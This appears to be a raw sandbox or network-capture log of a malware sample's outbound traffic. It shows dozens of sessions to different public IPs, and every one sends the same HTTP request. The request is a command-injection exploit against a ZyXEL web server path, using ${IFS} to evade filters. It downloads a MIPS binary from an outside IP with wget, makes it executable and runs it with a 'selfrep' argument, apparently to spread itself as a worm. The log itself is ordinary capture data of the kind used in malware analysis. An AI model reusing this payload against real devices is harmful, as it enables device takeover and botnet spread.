                                                Jan 28, 2024 10:16:32.930211067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6458192.168.2.2358888131.106.54.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.930228949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6459192.168.2.2340500221.183.113.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.930285931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6460192.168.2.233722896.122.224.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.930341005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6461192.168.2.2337300136.27.249.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.930351019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6462192.168.2.235703218.88.219.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.930378914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6463192.168.2.2360604202.247.8.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.930413008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6464192.168.2.2353764205.57.6.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.930435896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6465192.168.2.236092679.137.246.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.930435896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6466192.168.2.23560669.182.110.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.930504084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6467192.168.2.234739668.241.202.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.930531025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6468192.168.2.235609254.44.53.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.930560112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6469192.168.2.2345950165.173.242.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.930605888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6470192.168.2.23472088.253.40.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.930629015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6471192.168.2.233588672.150.212.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.930660009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6472192.168.2.23604104.178.29.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.930696964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6473192.168.2.2334034189.143.220.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.930728912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6474192.168.2.235608475.3.59.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.930782080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6475192.168.2.234982471.229.79.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.930825949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6476192.168.2.2352120159.121.88.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.932938099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6477192.168.2.2343822187.113.206.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.932959080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6478192.168.2.2350890188.22.134.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.928837061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6479192.168.2.2345084135.193.156.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.928884029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6480192.168.2.2351524173.64.70.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.928926945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6481192.168.2.235035461.196.186.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.928930998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6482192.168.2.2347434184.122.24.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.928945065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6483192.168.2.236059290.18.128.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.928985119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6484192.168.2.2334174175.51.160.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929002047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6485192.168.2.2358270196.35.75.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929044962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6486192.168.2.234546219.16.9.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929066896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6487192.168.2.23543364.23.126.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929073095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6488192.168.2.2344556181.136.83.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929076910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6489192.168.2.235063080.41.155.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929105997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6490192.168.2.2346726119.235.106.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929161072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6491192.168.2.2359550204.60.56.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929188013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6492192.168.2.233648470.53.15.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929197073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6493192.168.2.2350512105.168.118.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929225922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6494192.168.2.2358738218.205.168.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929239988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6495192.168.2.2354404181.108.249.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929267883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6496192.168.2.2341082147.19.10.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929296970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6497192.168.2.235126627.236.65.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929327965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6498192.168.2.233698298.244.79.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929353952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6499192.168.2.234779680.155.205.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929385900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6500192.168.2.234835286.253.250.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929405928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6501192.168.2.2350710166.81.117.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929435015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6502192.168.2.2354772146.221.46.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929470062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6503192.168.2.2343708205.31.52.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929500103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6504192.168.2.2344896144.102.24.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929538012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6505192.168.2.234736819.217.111.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929563046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6506192.168.2.2347772125.184.244.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929583073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6507192.168.2.236090274.98.135.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929636955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6508192.168.2.233446092.63.24.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929658890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6509192.168.2.235765267.100.18.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929692984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6510192.168.2.235116480.23.219.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929728985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6511192.168.2.2340500123.150.107.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929753065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6512192.168.2.2345994134.164.111.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929761887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6513192.168.2.236076051.60.224.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929795980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6514192.168.2.235998434.171.2.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929837942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6515192.168.2.2333582208.221.252.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929843903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6516192.168.2.233311836.68.201.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929863930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6517192.168.2.234999249.103.46.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929897070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6518192.168.2.2341366109.115.148.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.929930925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6519192.168.2.2340942196.31.54.73443
                                                TimestampBytes transferredDirectionData
